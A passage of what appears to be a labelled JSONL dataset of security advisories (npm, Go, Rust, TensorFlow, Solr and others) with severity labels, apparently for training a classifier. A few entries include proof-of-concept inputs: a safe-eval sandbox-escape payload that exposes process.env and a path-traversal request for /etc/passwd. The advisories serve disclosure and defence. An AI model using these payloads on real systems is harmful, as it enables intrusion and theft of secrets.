1.5.6 (run param) Local File Inclusion Vulnerability\n\nSeverity: medium", "severity": "medium", "severity_label": 1, "source": "zeroscience", "timestamp": "2014-03-25", "split": "train"} -{"id": "bb7bc828119c82fdc24a", "text": "Malicious Package in bconi\n\nAll versions of this package contained malware. The package was designed to find and exfiltrate cryptocurrency wallets.\n\n## Recommendation\n\nAny computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.\n\nThe package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.", "text_raw": "Malicious Package in bconi\n\n[Severity: CRITICAL]\n\nAll versions of this package contained malware. The package was designed to find and exfiltrate cryptocurrency wallets.\n\n\n## Recommendation\n\nAny computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.\n\nThe package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2020-09-04", "split": "train"} -{"id": "a1954616db6f46b1654c", "text": "There is a XML external entity expansion (XXE) vulnerability in Apache Solr\n\nThis vulnerability in Apache Solr 1.2 to 6.6.2 and 7.0.0 to 7.2.1 relates to an XML external entity expansion (XXE) in the `&dataConfig=` parameter of Solr's DataImportHandler. It can be used as XXE using file/ftp/http protocols in order to read arbitrary local files from the Solr server or the internal network.", "text_raw": "There is a XML external entity expansion (XXE) vulnerability in Apache Solr \n\n[Severity: HIGH]\n\nThis vulnerability in Apache Solr 1.2 to 6.6.2 and 7.0.0 to 7.2.1 relates to an XML external entity expansion (XXE) in the `&dataConfig=` parameter of Solr's DataImportHandler. It can be used as XXE using file/ftp/http protocols in order to read arbitrary local files from the Solr server or the internal network.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2018-10-17", "split": "train"} -{"id": "61d2f20ced33df70fe09", "text": "Injection in bodymen\n\nbodymen before 1.1.1 is vulnerable to Prototype Pollution. The handler function could be tricked into adding or modifying properties of Object.prototype using a __proto__ payload.", "text_raw": "Injection in bodymen\n\n[Severity: MEDIUM]\n\nbodymen before 1.1.1 is vulnerable to Prototype Pollution. The handler function could be tricked into adding or modifying properties of Object.prototype using a __proto__ payload.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2021-04-13", "split": "train"} -{"id": "d8a39ad3f2ce07ee930f", "text": "Cross-site scripting in anchorme\n\nAll versions of package anchorme are vulnerable to Cross-site Scripting (XSS) via the main functionality.", "text_raw": "Cross-site scripting in anchorme\n\n[Severity: MEDIUM]\n\nAll versions of package anchorme are vulnerable to Cross-site Scripting (XSS) via the main functionality.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2021-07-26", "split": "train"} -{"id": "331b687c0c65f78dcde8", "text": "Websocket requests did not call AuthenticateMethod\n\n### Impact\n\nDepending on implementation, a denial-of-service or privilege escalation vulnerability may occur in software that uses the `github.com/ecnepsnai/web` package with Web Sockets that have an AuthenticateMethod.\n\nThe `AuthenticateMethod` is not called, and `UserData` will be nil in request methods. Attempts to read the `UserData` may result in a panic.\n\nThis issue only affects web sockets where an `AuthenticateMethod` is supplied to the handle options. Users who do not use web sockets, or users who do not require authentication are not at risk.\n\n#### Example\n\nIn the example below, one would expect that the `AuthenticateMethod` function would be called for each request to `/example`\n\n```go\nhandleOptions := web.HandleOptions{\n\tAuthenticateMethod: func(request *http.Request) interface{} {\n\t\t// Assume there is logic here to check for an active sessions, look at cookies or headers, etc...\n\t\tvar session Session{} // Example\n\nreturn session\n\t},\n}\n\nserver.Socket(\"/example\", handle, handleOptions)\n```\n\nHowever, the method is not called, and therefor the `UserData` parameter of the request object in the handle will be nil, when it would have been expected to be the `session` object we returned.\n\n### Patches\n\nRelease v1.5.2 fixes this vulnerability. The authenticate method is now called for websocket requests.\n\nAll users of the web package should update to v1.5.2 or later.\n\n### Workarounds\n\nYou may work around this issue by making the authenticate method a named function, then calling that function at the start of the handle method for the websocket. Reject connections when the return value of the method is nil.", "text_raw": "Websocket requests did not call AuthenticateMethod\n\n[Severity: CRITICAL]\n\n### Impact\n\nDepending on implementation, a denial-of-service or privilege escalation vulnerability may occur in software that uses the `github.com/ecnepsnai/web` package with Web Sockets that have an AuthenticateMethod.\n\nThe `AuthenticateMethod` is not called, and `UserData` will be nil in request methods. Attempts to read the `UserData` may result in a panic.\n\nThis issue only affects web sockets where an `AuthenticateMethod` is supplied to the handle options. Users who do not use web sockets, or users who do not require authentication are not at risk.\n\n#### Example\n\nIn the example below, one would expect that the `AuthenticateMethod` function would be called for each request to `/example`\n\n```go\nhandleOptions := web.HandleOptions{\n\tAuthenticateMethod: func(request *http.Request) interface{} {\n\t\t// Assume there is logic here to check for an active sessions, look at cookies or headers, etc...\n\t\tvar session Session{} // Example\n\n\t\treturn session\n\t},\n}\n\nserver.Socket(\"/example\", handle, handleOptions)\n```\n\nHowever, the method is not called, and therefor the `UserData` parameter of the request object in the handle will be nil, when it would have been expected to be the `session` object we returned.\n\n### Patches\n\nRelease v1.5.2 fixes this vulnerability. The authenticate method is now called for websocket requests.\n\nAll users of the web package should update to v1.5.2 or later.\n\n### Workarounds\n\nYou may work around this issue by making the authenticate method a named function, then calling that function at the start of the handle method for the websocket. Reject connections when the return value of the method is nil.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2021-06-23", "split": "train"} -{"id": "614a246945f2de833eb7", "text": "Integer overflow in TFLite concatentation\n\n### Impact\nThe TFLite implementation of concatenation is [vulnerable to an integer overflow issue](https://github.com/tensorflow/tensorflow/blob/7b7352a724b690b11bfaae2cd54bc3907daf6285/tensorflow/lite/kernels/concatenation.cc#L70-L76):\n\n```cc\nfor (int d = 0; d < t0->dims->size; ++d) {\n if (d == axis) { \n sum_axis += t->dims->data[axis]; \n } else {\n TF_LITE_ENSURE_EQ(context, t->dims->data[d], t0->dims->data[d]);\n }\n}\n```\n\nAn attacker can craft a model such that the dimensions of one of the concatenation input overflow the values of `int`. TFLite uses `int` to represent tensor dimensions, whereas TF uses `int64`. Hence, valid TF models can trigger an integer overflow when converted to TFLite format.\n\n### Patches\nWe have patched the issue in GitHub commit [4253f96a58486ffe84b61c0415bb234a4632ee73](https://github.com/tensorflow/tensorflow/commit/4253f96a58486ffe84b61c0415bb234a4632ee73).\n\nThe fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range.\n\n### For more information\nPlease consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.\n\n### Attribution\nThis vulnerability has been reported by members of the Aivul Team from Qihoo 360.", "text_raw": "Integer overflow in TFLite concatentation\n\n[Severity: MEDIUM]\n\n### Impact\nThe TFLite implementation of concatenation is [vulnerable to an integer overflow issue](https://github.com/tensorflow/tensorflow/blob/7b7352a724b690b11bfaae2cd54bc3907daf6285/tensorflow/lite/kernels/concatenation.cc#L70-L76):\n\n```cc\nfor (int d = 0; d < t0->dims->size; ++d) {\n if (d == axis) { \n sum_axis += t->dims->data[axis]; \n } else {\n TF_LITE_ENSURE_EQ(context, t->dims->data[d], t0->dims->data[d]);\n }\n}\n```\n\nAn attacker can craft a model such that the dimensions of one of the concatenation input overflow the values of `int`. TFLite uses `int` to represent tensor dimensions, whereas TF uses `int64`. Hence, valid TF models can trigger an integer overflow when converted to TFLite format.\n\n### Patches\nWe have patched the issue in GitHub commit [4253f96a58486ffe84b61c0415bb234a4632ee73](https://github.com/tensorflow/tensorflow/commit/4253f96a58486ffe84b61c0415bb234a4632ee73).\n\nThe fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range.\n\n### For more information\nPlease consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.\n\n### Attribution\nThis vulnerability has been reported by members of the Aivul Team from Qihoo 360.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2021-05-21", "split": "train"} -{"id": "3ee05753737f08e107fa", "text": "Sandbox Breakout / Arbitrary Code Execution in safe-eval\n\nAll versions of `safe-eval` are vulnerable to Sandbox Escape leading to Remote Code Execution. The package fails to restrict access to the main context through Error objects. This may allow attackers to execute arbitrary code in the system.\n\nEvaluating the payload \n```js\n(function (){\n var ex = new Error\n ex.__proto__ = null\n ex.stack = {\n match: x => {\n return x.constructor.constructor(\"throw process.env\")()\n }\n }\n return ex\n})()\n```\n\nprints the contents of `process.env`.\n\n## Recommendation\n\nNo fix is currently available. Consider using an alternative package until a fix is made available.", "text_raw": "Sandbox Breakout / Arbitrary Code Execution in safe-eval\n\n[Severity: CRITICAL]\n\nAll versions of `safe-eval` are vulnerable to Sandbox Escape leading to Remote Code Execution. The package fails to restrict access to the main context through Error objects. This may allow attackers to execute arbitrary code in the system. \n\nEvaluating the payload \n```js\n(function (){\n var ex = new Error\n ex.__proto__ = null\n ex.stack = {\n match: x => {\n return x.constructor.constructor(\"throw process.env\")()\n }\n }\n return ex\n})()\n``` \n\nprints the contents of `process.env`.\n\n\n## Recommendation\n\nNo fix is currently available. Consider using an alternative package until a fix is made available.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2020-08-25", "split": "train"} -{"id": "bd480541a679575204f7", "text": "Improper Handling of Length Parameter Inconsistency in Compress\n\nWhen reading a specially crafted ZIP archive, Compress can be made to allocate large amounts of memory that finally leads to an out of memory error even for very small inputs. This could be used to mount a denial of service attack against services that use Compress' zip package.", "text_raw": "Improper Handling of Length Parameter Inconsistency in Compress\n\n[Severity: HIGH]\n\nWhen reading a specially crafted ZIP archive, Compress can be made to allocate large amounts of memory that finally leads to an out of memory error even for very small inputs. This could be used to mount a denial of service attack against services that use Compress' zip package.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-08-02", "split": "train"} -{"id": "500e0ed6761a2132935c", "text": "Path traversal in rollup-plugin-serve\n\nPath traversal in npm package `rollup-plugin-serve` before version 1.0.2. There is no path sanitization in `readFile` operation.", "text_raw": "Path traversal in rollup-plugin-serve\n\n[Severity: CRITICAL]\n\nPath traversal in npm package `rollup-plugin-serve` before version 1.0.2. There is no path sanitization in `readFile` operation.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2021-05-18", "split": "train"} -{"id": "c2f3b8c2b701c0f16fed", "text": "Arbitrary code execution in djv\n\nThis affects the package djv before 2.1.4. By controlling the schema file, an attacker can run arbitrary JavaScript code on the victim machine.", "text_raw": "Arbitrary code execution in djv\n\n[Severity: CRITICAL]\n\nThis affects the package djv before 2.1.4. By controlling the schema file, an attacker can run arbitrary JavaScript code on the victim machine.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2021-04-13", "split": "train"} -{"id": "f34f81574f77edc53284", "text": "Composer's missing argument delimiter can lead to code execution via VCS repository URLs or source download URLs on systems with Mercurial\n\nURLs for Mercurial repositories in the root composer.json and package source download URLs are not sanitized correctly. Specifically crafted URL values allow commands to be executed in the HgDriver if hg/Mercurial is installed on the system.\n\n### Impact\n- The impact to Composer users directly is limited as the composer.json file is typically under their own control and source download URLs can only be supplied by third party Composer repositories they explicitly trust to download and execute source code from, e.g. Composer plugins.\n- The main impact is to services passing user input to Composer, including Packagist.org and Private Packagist. This allowed users to trigger remote command injection. The vulnerability has been patched on Packagist.org and Private Packagist within 12h of receiving the initial vulnerability report and based on a review of logs, to the best of our knowledge, was not abused by anyone.\n- Other services/tools using VcsRepository/VcsDriver or derivatives may also be vulnerable and should upgrade their composer/composer dependency immediately\n\n### Patches\n1.10.22 and 2.0.13 include patches for this issue.", "text_raw": "Composer's missing argument delimiter can lead to code execution via VCS repository URLs or source download URLs on systems with Mercurial\n\n[Severity: HIGH]\n\nURLs for Mercurial repositories in the root composer.json and package source download URLs are not sanitized correctly. Specifically crafted URL values allow commands to be executed in the HgDriver if hg/Mercurial is installed on the system.\n\n### Impact\n- The impact to Composer users directly is limited as the composer.json file is typically under their own control and source download URLs can only be supplied by third party Composer repositories they explicitly trust to download and execute source code from, e.g. Composer plugins.\n- The main impact is to services passing user input to Composer, including Packagist.org and Private Packagist. This allowed users to trigger remote command injection. The vulnerability has been patched on Packagist.org and Private Packagist within 12h of receiving the initial vulnerability report and based on a review of logs, to the best of our knowledge, was not abused by anyone.\n- Other services/tools using VcsRepository/VcsDriver or derivatives may also be vulnerable and should upgrade their composer/composer dependency immediately\n\n### Patches\n1.10.22 and 2.0.13 include patches for this issue.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-04-29", "split": "train"} -{"id": "b3e53aa0ef192f396759", "text": "XXL-CONF Path Traversal vulnerability\n\nAn issue was discovered in XXL-CONF 1.6.0. There is a path traversal vulnerability via `../` in the keys parameter that can download any configuration file, related to `ConfController.java` and `PropUtil.java`.", "text_raw": "XXL-CONF Path Traversal vulnerability\n\n[Severity: HIGH]\n\nAn issue was discovered in XXL-CONF 1.6.0. There is a path traversal vulnerability via `../` in the keys parameter that can download any configuration file, related to `ConfController.java` and `PropUtil.java`.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2018-12-19", "split": "train"} -{"id": "4a69ba3b66c2dc32993f", "text": "Path Traversal in file-static-server\n\nAll versions of `file-static-server` are vulnerable to Path Traversal. Due to insufficient input sanitization in URLs, attackers can access server files by using relative paths when fetching files.\n\n## Recommendation\n\nNo fix is currently available. Consider using an alternative module until a fix is made available.", "text_raw": "Path Traversal in file-static-server\n\n[Severity: HIGH]\n\nAll versions of `file-static-server` are vulnerable to Path Traversal. Due to insufficient input sanitization in URLs, attackers can access server files by using relative paths when fetching files. \n\n\n## Recommendation\n\nNo fix is currently available. Consider using an alternative module until a fix is made available.\n", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2020-09-03", "split": "train"} -{"id": "b94abe5f3cea312caf10", "text": "Ruby-saml allows attackers to perform XML signature wrapping attacks\n\nruby-saml prior to version 1.3.0 is vulnerable to an XML signature wrapping attack in the specific scenario where there was a signature that referenced at the same time 2 elements (but past the scheme validator process since 1 of the element was inside the encrypted assertion).\nruby-saml users must update to 1.3.0, which implements 3 extra validations to mitigate this kind of attack.", "text_raw": "Ruby-saml allows attackers to perform XML signature wrapping attacks \n\n[Severity: HIGH]\n\nruby-saml prior to version 1.3.0 is vulnerable to an XML signature wrapping attack in the specific scenario where there was a signature that referenced at the same time 2 elements (but past the scheme validator process since 1 of the element was inside the encrypted assertion).\nruby-saml users must update to 1.3.0, which implements 3 extra validations to mitigate this kind of attack.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2018-08-21", "split": "train"} -{"id": "ae93cf3c435abe109dc4", "text": "Stark CRM v1.0 Multiple Script Injection And Session Riding Vulnerabilities", "text_raw": "Stark CRM v1.0 Multiple Script Injection And Session Riding Vulnerabilities\n\nSeverity: medium", "severity": "medium", "severity_label": 1, "source": "zeroscience", "timestamp": "2014-02-20", "split": "train"} -{"id": "b7cc72c99b186d84c56e", "text": "Expression Language Injection in Apache Syncope\n\nA Server-Side Template Injection was identified in Apache Syncope prior to 2.1.6 enabling attackers to inject arbitrary Java EL expressions, leading to an unauthenticated Remote Code Execution (RCE) vulnerability. Apache Syncope uses Java Bean Validation (JSR 380) custom constraint validators. When building custom constraint violation error messages, they support different types of interpolation, including Java EL expressions. Therefore, if an attacker can inject arbitrary data in the error message template being passed, they will be able to run arbitrary Java code.", "text_raw": "Expression Language Injection in Apache Syncope\n\n[Severity: CRITICAL]\n\nA Server-Side Template Injection was identified in Apache Syncope prior to 2.1.6 enabling attackers to inject arbitrary Java EL expressions, leading to an unauthenticated Remote Code Execution (RCE) vulnerability. Apache Syncope uses Java Bean Validation (JSR 380) custom constraint validators. When building custom constraint violation error messages, they support different types of interpolation, including Java EL expressions. Therefore, if an attacker can inject arbitrary data in the error message template being passed, they will be able to run arbitrary Java code.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2021-06-16", "split": "train"} -{"id": "46473c287d86a9fc7d32", "text": "Spring Security OAuth vulnerable to remote code execution (RCE)\n\nSpring Security OAuth versions prior to 2.3.3, prior to 2.2.2, prior to 2.1.2, and prior to 2.0.15 contain a remote code execution vulnerability. An attacker can craft an authorization request to the authorization endpoint that can lead to remote code execution when the resource owner is forwarded to the approval endpoint.", "text_raw": "Spring Security OAuth vulnerable to remote code execution (RCE)\n\n[Severity: CRITICAL]\n\nSpring Security OAuth versions prior to 2.3.3, prior to 2.2.2, prior to 2.1.2, and prior to 2.0.15 contain a remote code execution vulnerability. An attacker can craft an authorization request to the authorization endpoint that can lead to remote code execution when the resource owner is forwarded to the approval endpoint. ", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2018-10-18", "split": "train"} -{"id": "eaa649d0b23335c12801", "text": "Malicious Package in pizza-pasta\n\nVersion 1.0.3 of `pizza-pasta` contains malicious code as a install scripts. The package created folders in the system's Desktop and downloaded an image from `imgur.com`. The package also printed the users SSH keys to the console.\n\n## Recommendation\n\nRemove the package from your environment. There are no evidences of further compromise.", "text_raw": "Malicious Package in pizza-pasta\n\n[Severity: CRITICAL]\n\nVersion 1.0.3 of `pizza-pasta` contains malicious code as a install scripts. The package created folders in the system's Desktop and downloaded an image from `imgur.com`. The package also printed the users SSH keys to the console.\n\n\n## Recommendation\n\nRemove the package from your environment. There are no evidences of further compromise.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2020-09-03", "split": "train"} -{"id": "6490e38ff2f01c428396", "text": "SkaDate Lite 2.0 Multiple XSRF And Persistent XSS Vulnerabilities", "text_raw": "SkaDate Lite 2.0 Multiple XSRF And Persistent XSS Vulnerabilities\n\nSeverity: medium", "severity": "medium", "severity_label": 1, "source": "zeroscience", "timestamp": "2014-07-30", "split": "train"} -{"id": "720333662adc1d6292ad", "text": "Rate Limiting Bypass in express-brute\n\nAll versions of `express-brute` are vulnerable to Rate Limiting Bypass. Concurrent requests may lead to race conditions that cause the package to incorrectly count requests. This may allow an attacker to bypass the rate limiting provided by the package and execute requests without limiting.\n\n## Recommendation\n\nNo fix is currently available. Consider using an alternative module until a fix is made available.", "text_raw": "Rate Limiting Bypass in express-brute\n\n[Severity: MEDIUM]\n\nAll versions of `express-brute` are vulnerable to Rate Limiting Bypass. Concurrent requests may lead to race conditions that cause the package to incorrectly count requests. This may allow an attacker to bypass the rate limiting provided by the package and execute requests without limiting.\n\n\n## Recommendation\n\nNo fix is currently available. Consider using an alternative module until a fix is made available.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2019-06-07", "split": "train"} -{"id": "3da4c0723eca437eb0cf", "text": "Cross-site scripting in react-bootstrap-table\n\nAll versions of package react-bootstrap-table are vulnerable to Cross-site Scripting (XSS) via the dataFormat parameter. The problem is triggered when an invalid React element is returned, leading to dangerouslySetInnerHTML being used, which does not sanitize the output.", "text_raw": "Cross-site scripting in react-bootstrap-table\n\n[Severity: MEDIUM]\n\nAll versions of package react-bootstrap-table are vulnerable to Cross-site Scripting (XSS) via the dataFormat parameter. The problem is triggered when an invalid React element is returned, leading to dangerouslySetInnerHTML being used, which does not sanitize the output.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2021-12-10", "split": "train"} -{"id": "f6be30891bfb31f31bca", "text": "Google Chromium Blink Use-After-Free Vulnerability\n\nAffected: Google Chromium Blink\n\nGoogle Chromium Blink contains a use-after-free vulnerability that allows a remote attacker to potentially exploit heap corruption via a crafted HTML page. This vulnerability could affect multiple web browsers that utilize Chromium, including, but not limited to, Google Chrome, Microsoft Edge, and Opera.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-416\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "text_raw": "Google Chromium Blink Use-After-Free Vulnerability\n\nAffected: Google Chromium Blink\n\nGoogle Chromium Blink contains a use-after-free vulnerability that allows a remote attacker to potentially exploit heap corruption via a crafted HTML page. This vulnerability could affect multiple web browsers that utilize Chromium, including, but not limited to, Google Chrome, Microsoft Edge, and Opera.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-416\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "severity": "critical", "severity_label": 3, "source": "cisa_kev", "timestamp": "2021-11-03", "split": "train"} -{"id": "c6116fa59599b4ea52f0", "text": "Cross-Site Scripting in webtorrent\n\nVersions of `webtorrent` prior to 0.107.6 are vulnerable to Cross-Site Scripting. `webtorrent` servers started with `torrent.createServer()` lists a torrent's title and files in the index page without sanitization. This allows attackers to execute arbitrary JavaScript in the victim's browser through files with names containing the malicious payload. The issue is mitigated due to the fact that the server only allows fetching data pieces from the torrent.\n\n## Recommendation\n\nUpgrade to version 0.107.6 or later.", "text_raw": "Cross-Site Scripting in webtorrent\n\n[Severity: MEDIUM]\n\nVersions of `webtorrent` prior to 0.107.6 are vulnerable to Cross-Site Scripting. `webtorrent` servers started with `torrent.createServer()` lists a torrent's title and files in the index page without sanitization. This allows attackers to execute arbitrary JavaScript in the victim's browser through files with names containing the malicious payload. The issue is mitigated due to the fact that the server only allows fetching data pieces from the torrent.\n\n\n## Recommendation\n\nUpgrade to version 0.107.6 or later.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2019-09-04", "split": "train"} -{"id": "1fe2508c3a1bb3e21a70", "text": "Use after free in nano_arena\n\nAffected versions of this crate assumed that Borrow was guaranteed to return the same value on .borrow(). The borrowed index value was used to retrieve a mutable reference to a value.\n\nIf the Borrow implementation returned a different index, the split arena would allow retrieving the index as a mutable reference creating two mutable references to the same element. This violates Rust's aliasing rules and allows for memory safety issues such as writing out of bounds and use-after-frees.\n\nThe flaw was corrected in commit `6b83f9d` by storing the .borrow() value in a temporary variable.", "text_raw": "Use after free in nano_arena\n\n[Severity: CRITICAL]\n\nAffected versions of this crate assumed that Borrow was guaranteed to return the same value on .borrow(). The borrowed index value was used to retrieve a mutable reference to a value.\n\nIf the Borrow implementation returned a different index, the split arena would allow retrieving the index as a mutable reference creating two mutable references to the same element. This violates Rust's aliasing rules and allows for memory safety issues such as writing out of bounds and use-after-frees.\n\nThe flaw was corrected in commit `6b83f9d` by storing the .borrow() value in a temporary variable.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2021-08-25", "split": "train"} -{"id": "e6145aab5731a3588535", "text": "CSV injection in Craft CMS\n\n# Withdrawn\n\nDuplicate of GHSA-h7vq-5qgw-jwwq", "text_raw": "CSV injection in Craft CMS\n\n[Severity: HIGH]\n\n# Withdrawn \n\nDuplicate of GHSA-h7vq-5qgw-jwwq", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-10-04", "split": "train"} -{"id": "40dcc63dc5bbac7f4af4", "text": "Local Privilege Escalation in cloudflared\n\nIn `cloudflared` versions < 2020.8.1 (corresponding to 0.0.0-20200820025921-9323844ea773 on pkg.go.dev) on Windows, if an administrator has started `cloudflared` and set it to read configuration files from a certain directory, an unprivileged user can exploit a misconfiguration in order to escalate privileges and execute system-level commands. The misconfiguration was due to the way that `cloudflared` reads its configuration file. One of the locations that `cloudflared` reads from (C:\\etc\\) is not a secure by default directory due to the fact that Windows does not enforce access controls on this directory without further controls applied. A malformed config.yaml file can be written by any user. Upon reading this config, `cloudflared` would output an error message to a log file defined in the malformed config. The user-controlled log file location could be set to a specific location that Windows will execute when any user logs in.", "text_raw": "Local Privilege Escalation in cloudflared\n\n[Severity: HIGH]\n\nIn `cloudflared` versions < 2020.8.1 (corresponding to 0.0.0-20200820025921-9323844ea773 on pkg.go.dev) on Windows, if an administrator has started `cloudflared` and set it to read configuration files from a certain directory, an unprivileged user can exploit a misconfiguration in order to escalate privileges and execute system-level commands. The misconfiguration was due to the way that `cloudflared` reads its configuration file. One of the locations that `cloudflared` reads from (C:\\etc\\) is not a secure by default directory due to the fact that Windows does not enforce access controls on this directory without further controls applied. A malformed config.yaml file can be written by any user. Upon reading this config, `cloudflared` would output an error message to a log file defined in the malformed config. The user-controlled log file location could be set to a specific location that Windows will execute when any user logs in.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-05-24", "split": "train"} -{"id": "1f71cebd16c4034c62b9", "text": "Path Traversal in ponse\n\nVersions of `ponse` prior to 2.0.2 are vulnerable to Path Traversal. The package fails to sanitize URLs, allowing attackers to access server files outside of the served folder using relative paths.\n\n## Recommendation\n\nUpgrade to version 2.0.2 or later.", "text_raw": "Path Traversal in ponse\n\n[Severity: HIGH]\n\nVersions of `ponse` prior to 2.0.2 are vulnerable to Path Traversal. The package fails to sanitize URLs, allowing attackers to access server files outside of the served folder using relative paths.\n\n\n## Recommendation\n\nUpgrade to version 2.0.2 or later.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2020-09-03", "split": "train"} -{"id": "d6aceeba033a11608669", "text": "Directory Traversal in utahcityfinder\n\nAffected versions of `utahcityfinder` resolve relative file paths, resulting in a directory traversal vulnerability. A malicious actor can use this vulnerability to access files outside of the intended directory root, which may result in the disclosure of private files on the vulnerable system.\n\n**Example request:**\n```http\nGET /../../../../../../../../../../etc/passwd HTTP/1.1\nhost:foo\n```\n\n## Recommendation\n\nNo patch is available for this vulnerability.\n\nIt is recommended that the package is only used for local development, and if the functionality is needed for production, a different package is used instead.", "text_raw": "Directory Traversal in utahcityfinder\n\n[Severity: HIGH]\n\nAffected versions of `utahcityfinder` resolve relative file paths, resulting in a directory traversal vulnerability. A malicious actor can use this vulnerability to access files outside of the intended directory root, which may result in the disclosure of private files on the vulnerable system.\n\n**Example request:**\n```http\nGET /../../../../../../../../../../etc/passwd HTTP/1.1\nhost:foo\n```\n\n\n## Recommendation\n\nNo patch is available for this vulnerability.\n\nIt is recommended that the package is only used for local development, and if the functionality is needed for production, a different package is used instead.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2018-07-23", "split": "train"} -{"id": "7b989991d89d9b920a75", "text": "Incorrect Account Used for Signing\n\n### Impact\n\nAnybody using this library to sign with a BIP44 account other than the first account may be affected. If a user is signing with the first account (i.e. the account at index `0`), or with the legacy MEW/MyCrypto HD path, they are not affected.\n\nThe vulnerability impacts cases where the user signs a personal message or transaction without first adding the account. This includes cases where the user has already added the account in a previous session (i.e. they added the account, reset the application, then signed something). The serialization/deserialization process does restore a previously added account, but it doesn't restore the index instructing the keyring to use that account for signing. As a result, after serializing then deserializing the keyring state, the account at index `0` is always used for signing even if it isn't the current account.\n\n### Patches\n\nThis has been patched ([#14](https://github.com/MetaMask/eth-ledger-bridge-keyring/pull/14)) in version >=0.2.1 of [`eth-ledger-bridge-keyring`](https://www.npmjs.com/package/eth-ledger-bridge-keyring), and in version >=0.2.2 of [`@metamask/eth-ledger-bridge-keyring`](https://www.npmjs.com/package/@metamask/eth-ledger-bridge-keyring). Users are encouraged to migrate to the new package name.\n\n### Workarounds\n\nTo work around this problem without updating, you should remove then re-add the account before use. As long as the account was added during the lifetime of that process, signing with that account should work correctly.\n\n### For more information\n\nIf you have any questions or comments about this advisory:\n\n* Open an issue in [MetaMask/eth-ledger-bridge-keyring on GitHub](https://github.com/MetaMask/eth-ledger-bridge-keyring)\n* Email the MetaMask team at [hello@metamask.io](mailto:hello@metamask.io)", "text_raw": "Incorrect Account Used for Signing\n\n[Severity: HIGH]\n\n### Impact\n\nAnybody using this library to sign with a BIP44 account other than the first account may be affected. If a user is signing with the first account (i.e. the account at index `0`), or with the legacy MEW/MyCrypto HD path, they are not affected.\n\nThe vulnerability impacts cases where the user signs a personal message or transaction without first adding the account. This includes cases where the user has already added the account in a previous session (i.e. they added the account, reset the application, then signed something). The serialization/deserialization process does restore a previously added account, but it doesn't restore the index instructing the keyring to use that account for signing. As a result, after serializing then deserializing the keyring state, the account at index `0` is always used for signing even if it isn't the current account.\n\n### Patches\n\nThis has been patched ([#14](https://github.com/MetaMask/eth-ledger-bridge-keyring/pull/14)) in version >=0.2.1 of [`eth-ledger-bridge-keyring`](https://www.npmjs.com/package/eth-ledger-bridge-keyring), and in version >=0.2.2 of [`@metamask/eth-ledger-bridge-keyring`](https://www.npmjs.com/package/@metamask/eth-ledger-bridge-keyring). Users are encouraged to migrate to the new package name.\n\n### Workarounds\n\nTo work around this problem without updating, you should remove then re-add the account before use. As long as the account was added during the lifetime of that process, signing with that account should work correctly.\n\n### For more information\n\nIf you have any questions or comments about this advisory:\n\n* Open an issue in [MetaMask/eth-ledger-bridge-keyring on GitHub](https://github.com/MetaMask/eth-ledger-bridge-keyring)\n* Email the MetaMask team at [hello@metamask.io](mailto:hello@metamask.io)", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2020-03-24", "split": "train"} -{"id": "b282314a684a701cbd42", "text": "Reference binding to nullptr in `SdcaOptimizer`\n\n### Impact\nThe implementation of `tf.raw_ops.SdcaOptimizer` triggers undefined behavior due to dereferencing a null pointer:\n\n```python\nimport tensorflow as tf\n\nsparse_example_indices = [tf.constant((0), dtype=tf.int64), tf.constant((0), dtype=tf.int64)]\nsparse_feature_indices = [tf.constant([], shape=[0, 0, 0, 0], dtype=tf.int64), tf.constant((0), dtype=tf.int64)]\nsparse_feature_values = []\n\ndense_features = []\ndense_weights = []\n\nexample_weights = tf.constant((0.0), dtype=tf.float32)\nexample_labels = tf.constant((0.0), dtype=tf.float32)\n\nsparse_indices = [tf.constant((0), dtype=tf.int64), tf.constant((0), dtype=tf.int64)]\nsparse_weights = [tf.constant((0.0), dtype=tf.float32), 